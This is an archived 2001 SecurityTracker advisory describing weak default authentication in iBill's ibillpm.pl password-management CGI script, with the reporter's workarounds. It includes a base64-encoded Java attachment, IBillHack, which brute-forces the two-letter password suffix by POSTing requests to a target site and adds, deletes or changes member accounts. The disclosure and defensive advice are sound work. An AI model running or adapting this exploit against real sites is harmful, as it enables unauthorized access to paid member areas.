SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Commerce)  >   iBill Vendors:   Internet Billing Company (iBill)
iBill Internet Commerce Billing System Uses Weak Authentication Method in the Default Configuration, Allowing Remote Users to Modify User Accounts on the System
SecurityTracker Alert ID:  1002642
SecurityTracker URL:  http://securitytracker.com/id/1002642
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 26 2001
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in the iBill Internet commerce billing system. Weak authentication allows remote users to modify the system configuration.

It is reported that iBill uses a weak password authentication method for the "ibillpm.pl" Perl-based user management script, part of the Password Management system. The weak password is reportedly based on a customer-specific fixed value plus two lowercase letters.

A remote user can feasibly conduct a brute force attack, generating POST messages to guess the password and add, delete, or change the password of users in the .htpasswd file.

It is also reported that the software does not log POST data and does not track username changes.

This vulnerability affects users that use iBill's Password Managment system in the default configuration.

Demonstration exploit code is provided in the Source Message.

Impact:   A remote user can add an arbitrary username and password to a web site's "member" section.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following workarounds:

"1) Move the script to a less obvious place than the default so it's harder to find (don't forget to change the path at the iBill admin website).
2) Request that iBill set a more secure password for the ibillpm.pl script.
3) Change your webserver config (httpd.conf for Apache) to only allow addresses from .ibill.com to access the path to ibillpm.pl. See your webserver documentation for details on how to do this."

Vendor URL:  www.ibill.com/ (Links to External Site)
Cause:   Authentication error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  Perl-based

Message History:   None.


 Source Message Contents

Subject:  Weak authentication in iBill's Password Management CGI


--0-1797011989-1004037697=:10996
Content-Type: TEXT/PLAIN; charset=US-ASCII


Vulnerable Program: ibillpm.pl Perl CGI script
Distributed by: iBill Internet Billing Company, http://www.ibill.com

Problem: iBill hard codes a weak password for the user management script,
ibillpm.pl, installed for clients that use the Password Management system.
The weak password is the client's MASTER_ACCOUNT (which can be viewed in
the HTML of the site's signup pages) plus only 2 letters that are
lower-case (aa - zz). This allows a brute force POST to easily
add/delete/chgpwd of users in the .htpasswd file. The CGI keeps no
auditing record of what changes it makes, nor does the web log file
indicate what username was added to the system (doesn't log POST data). In
addition, the requests in the web log file all have HTTP response code
200, which usually doesn't indicate problems in error_log.

Impact: This allows an attacker to bypass the billing system and add an
arbitrary username/password to a website's "member" section. Thousands are
estimated to use the default setup.

Vulnerable Applications: Websites that use iBill's Password Management CGI
script, ibillpm.pl, using default setup process performed by iBill.
Vulnerable OS: Unix based.

Non-vulnerable Applications: Websites that do not use iBill's Password
Managment system, or use more secure settings other than default.
Non-vulnerable OS: WindowsNT/2000 or other systems not capable of running
ibillpm.pl Perl CGI.

How this was found: During installation and security audit for a client's
website.

Workarounds:
1) Move the script to a less obvious place than the default so it's harder
to find (don't forget to change the path at the iBill admin website).
2) Request that iBill set a more secure password for the ibillpm.pl
script.
3) Change your webserver config (httpd.conf for Apache) to only allow
addresses from .ibill.com to access the path to ibillpm.pl. See your
webserver documentation for details on how to do this.


See attached exploit source code.



--0-1797011989-1004037697=:10996
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="IBillHack.java.txt"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.BSO.4.40.0110251221370.10996@dqc.org>
Content-Description: 
Content-Disposition: attachment; filename="IBillHack.java.txt"

Ly8gMTAvMjUvMjAwMQ0KDQppbXBvcnQgamF2YS5uZXQuKjsNCmltcG9ydCBq
YXZhLmlvLio7DQoNCi8qKg0KKiBJQmlsbEhhY2sgY2xhc3MgZm9yIGluZm9y
bWF0aW9uYWwgcHVycG9zZXMgb25seS4NCiogVGhpcyBwcm9ncmFtIGJydXRl
LWZvcmNlcyBQT1NUIHJlcXVlc3RzIHRvIHRoZSBpQmlsbCBQYXNzd29yZCBN
YW5hZ2VtZW50IENHSQ0KKiBhbmQgYWxsb3dzIHVzIHRvIGFkZC9kZWxldGUg
dXNlcm5hbWVzIGFuZCBjaGFuZ2UgcGFzc3dvcmRzIG9uIHdlYnNpdGVzIA0K
KiB0aGF0IHVzZWQgaUJpbGwgUGFzc3dvcmQgTWFuYWdlbWVudCB1c2luZyBk
ZWZhdWx0IGluc3RhbGxhdGlvbi4NCiogQnkgZGVmYXVsdCBpQmlsbCBzZXRz
IHVwIHRoZSAkYXV0aHB3ZCBhcyBNQVNURVJfQUNDT1VOVHh4LCB3aGVyZSAi
eHgiIA0KKiBpcyBhIHBhaXIgb2YgbGV0dGVycyBbYS16XS4gSXQgaXMgc3Vn
Z2VzdGVkIHRoYXQgYWxsIGNsaWVudHMgb2YgaUJpbGwgDQoqIHRoYXQgdXNl
IFBhc3N3b3JkIE1hbmFnZW1lbnQgYXF1aXJlIGEgbmV3ICRhdXRocHdkIGZv
ciB0aGVpciBpYmlsbHBtLnBsIA0KKiBzY3JpcHQuDQoqIE1BU1RFUl9BQ0NP
VU5UIGNhbiBiZSBmb3VuZCBhcyBwYXJ0IG9mIHRoZSA8Rk9STT4gdGFnIG9u
IHRoZSBzaWdudXAgcGFnZXM6DQoqIDxpbnB1dCB0eXBlPSJoaWRkZW4iIG5h
bWU9ImFjY291bnQiIHZhbHVlPSIxMjM0NTYtNTAwIj4NCiogT1INCiogPGlu
cHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYWNjb3VudCIgdmFsdWU9IjEyMzQ1
NjUwMCI+DQoqIFRoZSBsYXN0IDMgZGlnaXRzIGlzIHRoZSBzdWItYWNjb3Vu
dCwgYW5kIHNvbXRpbWVzIHRoZXJlIGlzIGEgZGFzaCwgDQoqIHNvbWV0aW1l
cyBub3QuIEluIHRoaXMgY2FzZSBNQVNURVJfQUNDT1VOVD0xMjM0NTYuDQoq
DQoqIC9jZ2ktYmluL2liaWxscG0ucGwgaXMgdGhlIGRlZmF1bHQgcGF0aCB0
byB0aGUgQ0dJLiBTb21ldGltZXMgdGhlIHdlYm1hc3RlciANCiogaXMgc21h
cnQgZW5vdWdoIG5vdCB0byB1c2UgdGhlIGRlZmF1bHQgYW5kIHJlcXVlc3Qg
dGhhdCAkYXV0aHB3ZCBiZSBjaGFuZ2VkDQoqIHRvIHNvbWV0aGluZyBtb3Jl
IHNlY3VyZS4gSW4gYWRkaXRpb24gdG8gdGhlc2UgbWVhc3VyZXMsIGEgd2Vi
bWFzdGVyIGNhbiANCiogYWxzbyBtb2RpZnkgdGhlaXIgaHR0cGQuY29uZiB0
byBvbmx5IGFsbG93IGlCaWxsIElQIGFkZHJlc3NlcyB0byByZXF1ZXN0IA0K
KiB0aGUgUGFzc3dvcmQgTWFuYWdlbWVudCBDR0kgc2NyaXB0Lg0KKiANCiog
VGhlIGNvcnJlY3QgJGF1dGhwd2QgaXMgbm90IHNhdmVkIGhlcmUuIFRoYXQg
aXMgYW4gb3B0aW9uYWwgZXhlcmNpc2UgZm9yIA0KKiB0aGUgcmVhZGVyLiAN
CioNCiogSGVyZSBhcmUgdGhlIHJldHVybiBjb2RlcyBmcm9tIHRoZSBpYmls
bHBtLnBsIHNjcmlwdCAobm90IEhUVFAgc3RhdHVzIGNvZGVzKSANCiogYW5k
IHRoZWlyIG1lYW5pbmc6DQoqIA0KKiA1MDEgLSBhdXRoZW50aWNhdGlvbiBm
YWlsZWQNCiogNTAyIC0gaW52YWxpZCByZXF1ZXN0IHR5cGUgKGNvbW1hbmQg
bXVzdCBiZSBhZGQsIGRlbGV0ZSwgb3IgY2hncHdkKQ0KKiA1MDMgLSBmYWls
ZWQgdG8gbG9jYXRlIHRoZSBwYXNzd29yZCBmaWxlDQoqIDUwNCAtIGZhaWxl
ZCB0byBvcGVuIHRoZSBwYXNzd29yZCBmaWxlDQoqIDUwNSAtIHNwZWNpZmll
ZCB1c2VyIGFscmVhZHkgZXhpc3RzDQoqIDUwNiAtIHNwZWNpZmllZCB1c2Vy
IGRvZXNuJ3QgZXhpc3QNCiogNTA3IC0gaW52YWxpZCB1c2VybmFtZQ0KKiA1
MDggLSBpbnZhbGlkIHBhc3N3b3JkDQoqDQoqIDIwMSAtIGFkZCB1c2VyIHN1
Y2Nlc3MNCiogMjAyIC0gZGVsZXRlIHVzZXIgc3VjY2Vzcw0KKiAyMDMgLSBj
aGFuZ2UgcGFzc3dvcmQgc3VjY2Vzcw0KKg0KKi8NCg0KcHVibGljIGNsYXNz
IElCaWxsSGFjayB7DQoNCiAgICBwdWJsaWMgc3RhdGljIHZvaWQgbWFpbihT
dHJpbmcgYXJnc1tdKSB7DQogICAgICAgIGlmIChhcmdzLmxlbmd0aCAhPSA2
KSB7DQogICAgICAgICAgICBTeXN0ZW0uZXJyLnByaW50bG4oIlVzYWdlOiBq
YXZhIElCaWxsSGFjayA8dGFyZ2V0X2hvc3RuYW1lPiA8L3BhdGgvdG8vY2dp
LWJpbi9pYmlsbHBtLnBsPiAiICsgDQogICAgICAgICAgICAgICAgICAgICAg
ICAiPGFkZHxkZWxldGV8Y2hncHdkPiA8dXNlcm5hbWU+IDxwYXNzd29yZD4g
PG1hc3Rlcl9hY2NvdW50PiIpOw0KICAgICAgICAgICAgU3lzdGVtLmVyci5w
cmludGxuKCJFeGFtcGxlOiBqYXZhIElCaWxsSGFjayB3d3cuc29tZXNpdGUu
Y29tIC9jZ2ktYmluL2liaWxscG0ucGwgYWRkIGJvYiAxcGFzcyAxMjM0NTYi
KTsNCiAgICAgICAgICAgIFN5c3RlbS5leGl0KDEpOw0KICAgICAgICB9IA0K
DQogICAgICAgIGNoYXIgbGV0dGVyc1tdID0gew0KICAgICAgICAgICAgJ2En
LCAnYicsICdjJywgJ2QnLCAnZScsICdmJywgJ2cnLCAnaCcsICdpJywgJ2on
LCAnaycsICdsJywgJ20nLCANCiAgICAgICAgICAgICduJywgJ28nLCAncCcs
ICdxJywgJ3InLCAncycsICd0JywgJ3UnLCAndicsICd3JywgJ3gnLCAneScs
ICd6Jw0KICAgICAgICB9Ow0KDQogICAgICAgIGZvciAoaW50IGkgPSAwOyBp
IDwgbGV0dGVycy5sZW5ndGg7IGkrKykgew0KICAgICAgICAgICAgZm9yIChp
bnQgaiA9IDA7IGogPCBsZXR0ZXJzLmxlbmd0aDsgaisrKSB7DQogICAgICAg
ICAgICAgICAgdHJ5IHsNCiAgICAgICAgICAgICAgICAgICAgU29ja2V0IHMg
PSBuZXcgU29ja2V0KEluZXRBZGRyZXNzLmdldEJ5TmFtZShhcmdzWzBdKSwg
ODApOw0KICAgICAgICAgICAgICAgICAgICBTdHJpbmdCdWZmZXIgaGVhZGVy
cyA9IG5ldyBTdHJpbmdCdWZmZXIoKTsNCg0KICAgICAgICAgICAgICAgICAg
ICBoZWFkZXJzLmFwcGVuZCgiUE9TVCAiICsgYXJnc1sxXSArICIgSFRUUC8x
LjFcbiIpOw0KICAgICAgICAgICAgICAgICAgICBoZWFkZXJzLmFwcGVuZCgi
UmVmZXJlcjogaHR0cDovLyIgKyBhcmdzWzBdICsgYXJnc1sxXSANCiAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgKyAiXG4iKTsNCiAgICAg
ICAgICAgICAgICAgICAgaGVhZGVycy5hcHBlbmQoIkNvbnRlbnQtVHlwZTog
YXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkXG4iKTsNCiAgICAg
ICAgICAgICAgICAgICAgaGVhZGVycy5hcHBlbmQoIlVzZXItQWdlbnQ6IE1v
emlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDUuNTsgV2luZG93cyBOVCA1
LjApXG4iKTsNCiAgICAgICAgICAgICAgICAgICAgaGVhZGVycy5hcHBlbmQo
Ikhvc3Q6ICIgKyBhcmdzWzBdICsgIlxuIik7DQoNCiAgICAgICAgICAgICAg
ICAgICAgU3RyaW5nQnVmZmVyIHF1ZXJ5ID0gbmV3IFN0cmluZ0J1ZmZlcigp
Ow0KDQogICAgICAgICAgICAgICAgICAgIHF1ZXJ5LmFwcGVuZCgiXG5hdXRo
cHdkPSIgKyBhcmdzWzVdICsgbGV0dGVyc1tpXSANCiAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICsgbGV0dGVyc1tqXSArICImcmVxdHlwZT0i
ICsgYXJnc1syXSANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICsgIiZ1c2VybmFtZT0iICsgYXJnc1szXSArICImcGFzc3dvcmQ9IiANCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICsgYXJnc1s0XSArICIm
c3VibWl0PVN1Ym1pdFxuIik7DQoNCiAgICAgICAgICAgICAgICAgICAgU3Ry
aW5nIHEgPSBxdWVyeS50b1N0cmluZygpOw0KDQogICAgICAgICAgICAgICAg
ICAgIGhlYWRlcnMuYXBwZW5kKCJDb250ZW50LUxlbmd0aDogIiArIHEubGVu
Z3RoKCkgKyAiXG4iKTsNCg0KICAgICAgICAgICAgICAgICAgICBPdXRwdXRT
dHJlYW0gb3MgPSANCiAgICAgICAgICAgICAgICAgICAgICAgIG5ldyBCdWZm
ZXJlZE91dHB1dFN0cmVhbShzLmdldE91dHB1dFN0cmVhbSgpKTsNCg0KICAg
ICAgICAgICAgICAgICAgICBvcy53cml0ZShoZWFkZXJzLnRvU3RyaW5nKCku
Z2V0Qnl0ZXMoKSk7DQogICAgICAgICAgICAgICAgICAgIG9zLndyaXRlKHEu
Z2V0Qnl0ZXMoKSk7DQogICAgICAgICAgICAgICAgICAgIG9zLmZsdXNoKCk7
DQoNCiAgICAgICAgICAgICAgICAgICAgU3lzdGVtLmVyci5wcmludGxuKCJT
ZW5kaW5nLi4uIik7DQogICAgICAgICAgICAgICAgICAgIFN5c3RlbS5vdXQu
cHJpbnQoaGVhZGVycy50b1N0cmluZygpKTsNCiAgICAgICAgICAgICAgICAg
ICAgU3lzdGVtLm91dC5wcmludGxuKHEpOw0KDQogICAgICAgICAgICAgICAg
ICAgIHMuY2xvc2UoKTsNCg0KICAgICAgICAgICAgICAgICAgICBUaHJlYWQu
c2xlZXAoNTAwKTsNCiAgICAgICAgICAgICAgICB9IGNhdGNoIChFeGNlcHRp
b24gZSkgew0KICAgICAgICAgICAgICAgICAgICBlLnByaW50U3RhY2tUcmFj
ZSgpOw0KICAgICAgICAgICAgICAgIH0gDQogICAgICAgICAgICB9IA0KICAg
ICAgICB9IA0KDQoJCVN5c3RlbS5lcnIucHJpbnRsbigiLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0iKTsNCgkJU3lzdGVtLmVyci5wcmludGxuKCJGaW5pc2hl
ZCB0cnlpbmcgYWxsIGFhLXp6IGNvbWJpbmF0aW9ucyBmb3IgTUFTVEVSX0FD
Q09VTlQgIiArIGFyZ3NbNV0pOw0KCQlTeXN0ZW0uZXJyLnByaW50bG4oIlRy
eSBsb2dnaW5nIGludG8gdGhlIG1lbWJlcnMgc2VjdGlvbiBvZiAiICsgYXJn
c1swXSArICIgd2l0aCB1c2VybmFtZS9wYXNzd29yZCAiICsgYXJnc1szXSAr
ICIvIiArIGFyZ3NbNF0pOw0KCQlTeXN0ZW0uZXJyLnByaW50bG4oIi0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tIik7DQogICAgfSANCg0KfQ0K
--0-1797011989-1004037697=:10996--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC